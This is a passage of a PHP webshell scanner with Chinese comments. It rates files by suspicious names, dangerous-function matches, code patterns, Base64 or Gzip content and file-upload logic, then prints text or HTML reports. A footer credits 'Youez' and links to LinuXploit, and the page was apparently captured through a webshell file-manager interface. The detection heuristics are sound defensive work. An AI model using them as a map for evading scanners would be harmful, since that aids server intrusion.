        $result[&#039;filename_suspicious&#039;] = $this-&gt;checkSuspiciousFilename($result[&#039;filename&#039;]);
        if ($result[&#039;filename_suspicious&#039;]) {
            $result[&#039;risk_level&#039;] += 3;
        }
        
        // 读取文件内容
        $content = @file_get_contents($filepath);
        if ($content === false) {
            $result[&#039;error&#039;] = &quot;无法读取文件&quot;;
            return $result;
        }
        
        // 检查危险函数
        $dangerous_functions = $this-&gt;checkDangerousFunctions($content);
        $result[&#039;dangerous_functions&#039;] = $dangerous_functions;
        if (!empty($dangerous_functions)) {
            $result[&#039;risk_level&#039;] += count($dangerous_functions) * 2;
        }
        
        // 检查可疑代码模式
        $suspicious_patterns = $this-&gt;checkSuspiciousPatterns($content);
        $result[&#039;suspicious_patterns&#039;] = $suspicious_patterns;
        if (!empty($suspicious_patterns)) {
            $result[&#039;risk_level&#039;] += count($suspicious_patterns) * 3;
        }
        
        // 检查文件编码（Base64编码等）
        if ($this-&gt;checkEncodedContent($content)) {
            $result[&#039;encoded_content&#039;] = true;
            $result[&#039;risk_level&#039;] += 4;
        }
        
        // 检查是否为Webshell上传器
        if (strpos($content, &#039;move_uploaded_file&#039;) !== false &amp;&amp; 
            strpos($content, &#039;$_FILES&#039;) !== false) {
            $result[&#039;uploader_detected&#039;] = true;
            $result[&#039;risk_level&#039;] += 5;
        }
        
        // 判断是否可疑
        if ($result[&#039;risk_level&#039;] &gt;= 3) {
            $result[&#039;suspicious&#039;] = true;
            $this-&gt;stats[&#039;suspicious_files&#039;]++;
        }
        
        return $result;
    }
    
    /**
     * 开始扫描
     * @param string $directory 要扫描的目录
     * @param bool $recursive 是否递归扫描
     * @return array 扫描结果
     */
    public function startScan($directory, $recursive = true) {
        $this-&gt;stats[&#039;start_time&#039;] = time();
        $this-&gt;stats[&#039;total_files&#039;] = 0;
        $this-&gt;stats[&#039;scanned_files&#039;] = 0;
        $this-&gt;stats[&#039;suspicious_files&#039;] = 0;
        $this-&gt;results = [];
        
        $this-&gt;log(&quot;开始扫描目录: {$directory}&quot;);
        $this-&gt;log(&quot;开始时间: &quot; . date(&#039;Y-m-d H:i:s&#039;, $this-&gt;stats[&#039;start_time&#039;]));
        
        try {
            set_time_limit($this-&gt;config[&#039;max_scan_time&#039;] + 10);
            $this-&gt;results = $this-&gt;scanDirectory($directory, $recursive);
        } catch (Exception $e) {
            $this-&gt;log(&quot;扫描过程中出错: &quot; . $e-&gt;getMessage());
        }
        
        $this-&gt;stats[&#039;end_time&#039;] = time();
        $duration = $this-&gt;stats[&#039;end_time&#039;] - $this-&gt;stats[&#039;start_time&#039;];
        
        $this-&gt;log(&quot;扫描完成!&quot;);
        $this-&gt;log(&quot;扫描耗时: {$duration} 秒&quot;);
        $this-&gt;log(&quot;发现可疑文件: {$this-&gt;stats[&#039;suspicious_files&#039;]} 个&quot;);
        $this-&gt;log(&quot;总扫描文件数: {$this-&gt;stats[&#039;scanned_files&#039;]} 个&quot;);
        
        return [
            &#039;results&#039; =&gt; $this-&gt;results,
            &#039;stats&#039; =&gt; $this-&gt;stats,
        ];
    }
    
    /**
     * 检查超时
     * @return bool
     */
    private function checkTimeout() {
        $current_time = time();
        $elapsed_time = $current_time - $this-&gt;stats[&#039;start_time&#039;];
        
        return $elapsed_time &gt; $this-&gt;config[&#039;max_scan_time&#039;];
    }
    
    /**
     * 检查文件名是否可疑
     */
    private function checkSuspiciousFilename($filename) {
        $filename_lower = strtolower($filename);
        
        foreach ($this-&gt;suspicious_filenames as $suspicious) {
            if (strpos($filename_lower, $suspicious) !== false) {
                return true;
            }
        }
        
        return false;
    }
    
    /**
     * 检查文件内容中的危险函数
     */
    private function checkDangerousFunctions($content) {
        $found = [];
        
        foreach ($this-&gt;dangerous_functions as $function) {
            $func_name = rtrim($function, &#039;(&#039;);
            $pattern = &#039;/\b&#039; . preg_quote($func_name, &#039;/&#039;) . &#039;\s*\(/i&#039;;
            
            if (preg_match($pattern, $content)) {
                $found[] = $function;
            }
        }
        
        return $found;
    }
    
    /**
     * 检查可疑代码模式
     */
    private function checkSuspiciousPatterns($content) {
        $found = [];
        
        foreach ($this-&gt;suspicious_patterns as $pattern) {
            if (preg_match($pattern, $content, $matches)) {
                $found[] = [
                    &#039;pattern&#039; =&gt; $pattern,
                    &#039;match&#039; =&gt; substr($matches[0] ?? &#039;&#039;, 0, 200)
                ];
            }
        }
        
        return $found;
    }
    
    /**
     * 检查编码内容
     */
    private function checkEncodedContent($content) {
        // 检查Base64编码
        if (preg_match(&#039;/[A-Za-z0-9+\/=]{50,}/&#039;, $content)) {
            return true;
        }
        
        // 检查Gzip编码
        if (preg_match(&#039;/\x1f\x8b\x08/&#039;, $content)) {
            return true;
        }
        
        return false;
    }
    
    /**
     * 判断是否为PHP文件
     */
    private function isPhpFile($filepath) {
        $extension = strtolower(pathinfo($filepath, PATHINFO_EXTENSION));
        return in_array($extension, $this-&gt;config[&#039;scan_extensions&#039;]);
    }
    
    /**
     * 记录日志
     */
    private function log($message) {
        $timestamp = date(&#039;Y-m-d H:i:s&#039;);
        $log_message = &quot;[{$timestamp}] {$message}&quot; . PHP_EOL;
        
        // 输出到控制台
        if (php_sapi_name() === &#039;cli&#039;) {
            echo $log_message;
        }
        
        // 写入日志文件
        if (!empty($this-&gt;config[&#039;log_file&#039;])) {
            @file_put_contents($this-&gt;config[&#039;log_file&#039;], $log_message, FILE_APPEND);
        }
    }
    
    /**
     * 生成报告
     */
    public function generateReport($format = &#039;text&#039;) {
        $report = &quot;&quot;;
        
        if ($format === &#039;html&#039;) {
            $report .= &quot;&lt;!DOCTYPE html&gt;
            &lt;html&gt;
            &lt;head&gt;
                &lt;title&gt;Webshell 扫描报告&lt;/title&gt;
                &lt;style&gt;
                    body { font-family: Arial, sans-serif; margin: 20px; }
                    .container { max-width: 1200px; margin: 0 auto; }
                    .summary { background: #f5f5f5; padding: 20px; border-radius: 5px; margin-bottom: 20px; }
                    .suspicious-file { border: 1px solid #ddd; padding: 15px; margin-bottom: 10px; border-radius: 5px; }
                    .risk-high { border-left: 5px solid #d9534f; }
                    .risk-medium { border-left: 5px solid #f0ad4e; }
                    .risk-low { border-left: 5px solid #5bc0de; }
                    .risk-level { font-weight: bold; padding: 3px 8px; border-radius: 3px; }
                    .risk-high .risk-level { background: #d9534f; color: white; }
                    .risk-medium .risk-level { background: #f0ad4e; color: white; }
                    .risk-low .risk-level { background: #5bc0de; color: white; }
                    pre { background: #f8f8f8; padding: 10px; overflow: auto; }
                &lt;/style&gt;
            &lt;/head&gt;
            &lt;body&gt;
                &lt;div class=&#039;container&#039;&gt;
                    &lt;h1&gt;Webshell 扫描报告&lt;/h1&gt;
                    &lt;div class=&#039;summary&#039;&gt;
                        &lt;h3&gt;扫描统计&lt;/h3&gt;
                        &lt;p&gt;扫描时间: &quot; . date(&#039;Y-m-d H:i:s&#039;, $this-&gt;stats[&#039;start_time&#039;]) . &quot; - &quot; . 
                          date(&#039;Y-m-d H:i:s&#039;, $this-&gt;stats[&#039;end_time&#039;]) . &quot;&lt;/p&gt;
                        &lt;p&gt;耗时: &quot; . ($this-&gt;stats[&#039;end_time&#039;] - $this-&gt;stats[&#039;start_time&#039;]) . &quot; 秒&lt;/p&gt;
                        &lt;p&gt;总文件数: {$this-&gt;stats[&#039;total_files&#039;]}&lt;/p&gt;
                        &lt;p&gt;扫描文件数: {$this-&gt;stats[&#039;scanned_files&#039;]}&lt;/p&gt;
                        &lt;p&gt;可疑文件数: {$this-&gt;stats[&#039;suspicious_files&#039;]}&lt;/p&gt;
                    &lt;/div&gt;&quot;;
            
            if (!empty($this-&gt;results)) {
                $report .= &quot;&lt;h3&gt;可疑文件详情&lt;/h3&gt;&quot;;
                
                foreach ($this-&gt;results as $result) {
                    $risk_class = &#039;risk-low&#039;;
                    if ($result[&#039;risk_level&#039;] &gt;= 8) {
                        $risk_class = &#039;risk-high&#039;;
                    } elseif ($result[&#039;risk_level&#039;] &gt;= 4) {
                        $risk_class = &#039;risk-medium&#039;;
                    }
                    
                    $report .= &quot;&lt;div class=&#039;suspicious-file {$risk_class}&#039;&gt;
                        &lt;h4&gt;{$result[&#039;filepath&#039;]} 
                            &lt;span class=&#039;risk-level&#039;&gt;风险等级: {$result[&#039;risk_level&#039;]}&lt;/span&gt;
                        &lt;/h4&gt;
                        &lt;p&gt;文件大小: &quot; . $this-&gt;formatSize($result[&#039;size&#039;]) . &quot; | 
                           修改时间: &quot; . date(&#039;Y-m-d H:i:s&#039;, $result[&#039;mtime&#039;]) . &quot;&lt;/p&gt;&quot;;
                    
                    if ($result[&#039;filename_suspicious&#039;]) {
                        $report .= &quot;&lt;p style=&#039;color: #d9534f;&#039;&gt;⚠️ 文件名可疑&lt;/p&gt;&quot;;
                    }
                    
                    if (!empty($result[&#039;dangerous_functions&#039;])) {
                        $report .= &quot;&lt;p&gt;发现危险函数: &quot; . implode(&#039;, &#039;, $result[&#039;dangerous_functions&#039;]) . &quot;&lt;/p&gt;&quot;;
                    }
                    
                    if (!empty($result[&#039;suspicious_patterns&#039;])) {
                        $report .= &quot;&lt;p&gt;可疑代码模式:&lt;/p&gt;&lt;ul&gt;&quot;;
                        foreach ($result[&#039;suspicious_patterns&#039;] as $pattern) {
                            $match = htmlspecialchars($pattern[&#039;match&#039;]);
                            $report .= &quot;&lt;li&gt;匹配: {$match}&lt;/li&gt;&quot;;
                        }
                        $report .= &quot;&lt;/ul&gt;&quot;;
                    }
                    
                    if (!empty($result[&#039;encoded_content&#039;])) {
                        $report .= &quot;&lt;p style=&#039;color: #d9534f;&#039;&gt;⚠️ 发现编码内容&lt;/p&gt;&quot;;
                    }
                    
                    if (!empty($result[&#039;uploader_detected&#039;])) {
                        $report .= &quot;&lt;p style=&#039;color: #d9534f;&#039;&gt;⚠️ 疑似文件上传器&lt;/p&gt;&quot;;
                    }
                    
                    $report .= &quot;&lt;/div&gt;&quot;;
                }
            } else {
                $report .= &quot;&lt;p&gt;未发现可疑文件。&lt;/p&gt;&quot;;
            }
            
            $report .= &quot;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;&quot;;
        } else {
            // 文本格式报告
            $report .= &quot;Webshell 扫描报告\n&quot;;
            $report .= &quot;=&quot; . str_repeat(&quot;=&quot;, 50) . &quot;\n&quot;;
            $report .= &quot;扫描时间: &quot; . date(&#039;Y-m-d H:i:s&#039;, $this-&gt;stats[&#039;start_time&#039;]) . &quot; - &quot; . 
                      date(&#039;Y-m-d H:i:s&#039;, $this-&gt;stats[&#039;end_time&#039;]) . &quot;\n&quot;;
            $report .= &quot;耗时: &quot; . ($this-&gt;stats[&#039;end_time&#039;] - $this-&gt;stats[&#039;start_time&#039;]) . &quot; 秒\n&quot;;
            $report .= &quot;总文件数: {$this-&gt;stats[&#039;total_files&#039;]}\n&quot;;
            $report .= &quot;扫描文件数: {$this-&gt;stats[&#039;scanned_files&#039;]}\n&quot;;
            $report .= &quot;可疑文件数: {$this-&gt;stats[&#039;suspicious_files&#039;]}\n\n&quot;;
            
            if (!empty($this-&gt;results)) {
                $report .= &quot;可疑文件列表:\n&quot;;
                $report .= str_repeat(&quot;-&quot;, 80) . &quot;\n&quot;;
                
                foreach ($this-&gt;results as $result) {
                    $risk_level = $result[&#039;risk_level&#039;];
                    $risk_text = &quot;低风险&quot;;
                    if ($risk_level &gt;= 8) {
                        $risk_text = &quot;高风险&quot;;
                    } elseif ($risk_level &gt;= 4) {
                        $risk_text = &quot;中风险&quot;;
                    }
                    
                    $report .= &quot;文件: {$result[&#039;filepath&#039;]}\n&quot;;
                    $report .= &quot;风险等级: {$risk_level} ({$risk_text})\n&quot;;
                    $report .= &quot;大小: &quot; . $this-&gt;formatSize($result[&#039;size&#039;]) . &quot; | 修改时间: &quot; . 
                              date(&#039;Y-m-d H:i:s&#039;, $result[&#039;mtime&#039;]) . &quot;\n&quot;;
                    
                    if ($result[&#039;filename_suspicious&#039;]) {
                        $report .= &quot;⚠️ 文件名可疑\n&quot;;
                    }
                    
                    if (!empty($result[&#039;dangerous_functions&#039;])) {
                        $report .= &quot;危险函数: &quot; . implode(&#039;, &#039;, $result[&#039;dangerous_functions&#039;]) . &quot;\n&quot;;
                    }
                    
                    if (!empty($result[&#039;suspicious_patterns&#039;])) {
                        $report .= &quot;可疑代码:\n&quot;;
                        foreach ($result[&#039;suspicious_patterns&#039;] as $pattern) {
                            $report .= &quot;  - &quot; . substr($pattern[&#039;match&#039;], 0, 100) . 
                                      (strlen($pattern[&#039;match&#039;]) &gt; 100 ? &#039;...&#039; : &#039;&#039;) . &quot;\n&quot;;
                        }
                    }
                    
                    if (!empty($result[&#039;encoded_content&#039;])) {
                        $report .= &quot;⚠️ 发现编码内容\n&quot;;
                    }
                    
                    if (!empty($result[&#039;uploader_detected&#039;])) {
                        $report .= &quot;⚠️ 疑似文件上传器\n&quot;;
                    }
                    
                    $report .= str_repeat(&quot;-&quot;, 80) . &quot;\n&quot;;
                }
            } else {
                $report .= &quot;未发现可疑文件。\n&quot;;
            }
        }
        
        return $report;
    }
    
    /**
     * 格式化文件大小
     */
    private function formatSize($bytes) {
        if ($bytes &gt;= 1073741824) {
            return number_format($bytes / 1073741824, 2) . &#039; GB&#039;;
        } elseif ($bytes &gt;= 1048576) {
            return number_format($bytes / 1048576, 2) . &#039; MB&#039;;
        } elseif ($bytes &gt;= 1024) {
            return number_format($bytes / 1024, 2) . &#039; KB&#039;;
        } else {
            return $bytes . &#039; Bytes&#039;;
        }
    }
}

/**
 * 命令行接口
 */
if (php_sapi_name() === &#039;cli&#039;) {
    // 解析命令行参数
    $options = getopt(&quot;d:o:l:t:&quot;, [&#039;dir:&#039;, &#039;output:&#039;, &#039;log:&#039;, &#039;timeout:&#039;, &#039;help&#039;]);
    
    if (isset($options[&#039;help&#039;]) || empty($options)) {
        echo &quot;Webshell 检测工具（命令行版）\n&quot;;
        echo &quot;用法: php &quot; . basename(__FILE__) . &quot; [选项]\n\n&quot;;
        echo &quot;选项:\n&quot;;
        echo &quot;  -d, --dir=目录      要扫描的目录（默认：当前目录）\n&quot;;
        echo &quot;  -o, --output=文件   输出报告文件\n&quot;;
        echo &quot;  -l, --log=文件      日志文件\n&quot;;
        echo &quot;  -t, --timeout=秒    最大扫描时间（默认：300秒）\n&quot;;
        echo &quot;  --help             显示此帮助信息\n&quot;;
        exit(0);
    }
    
    $directory = $options[&#039;d&#039;] ?? $options[&#039;dir&#039;] ?? &#039;.&#039;;
    $output_file = $options[&#039;o&#039;] ?? $options[&#039;output&#039;] ?? &#039;&#039;;
    $log_file = $options[&#039;l&#039;] ?? $options[&#039;log&#039;] ?? &#039;webshell_scan.log&#039;;
    $timeout = $options[&#039;t&#039;] ?? $options[&#039;timeout&#039;] ?? 300;
    
    $config = [
        &#039;max_scan_time&#039; =&gt; (int)$timeout,
        &#039;log_file&#039; =&gt; $log_file,
    ];
    
    $detector = new WebshellDetector($config);
    
    try {
        echo &quot;开始扫描目录: {$directory}\n&quot;;
        echo &quot;超时时间: {$timeout} 秒\n&quot;;
        echo &quot;日志文件: {$log_file}\n&quot;;
        echo str_repeat(&quot;=&quot;, 60) . &quot;\n&quot;;
        
        $result = $detector-&gt;startScan($directory, true);
        
        // 生成报告
        $report = $detector-&gt;generateReport(&#039;text&#039;);
        
        // 输出到控制台
        echo $report;
        
        // 输出到文件
        if (!empty($output_file)) {
            $format = (pathinfo($output_file, PATHINFO_EXTENSION) === &#039;html&#039;) ? &#039;html&#039; : &#039;text&#039;;
            $file_report = $detector-&gt;generateReport($format);
            file_put_contents($output_file, $file_report);
            echo &quot;\n报告已保存到: {$output_file}\n&quot;;
        }
        
        // 如果发现可疑文件，设置非零退出码
        if ($result[&#039;stats&#039;][&#039;suspicious_files&#039;] &gt; 0) {
            exit(1);
        }
        
    } catch (Exception $e) {
        echo &quot;错误: &quot; . $e-&gt;getMessage() . &quot;\n&quot;;
        exit(2);
    }
}
?&gt;</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>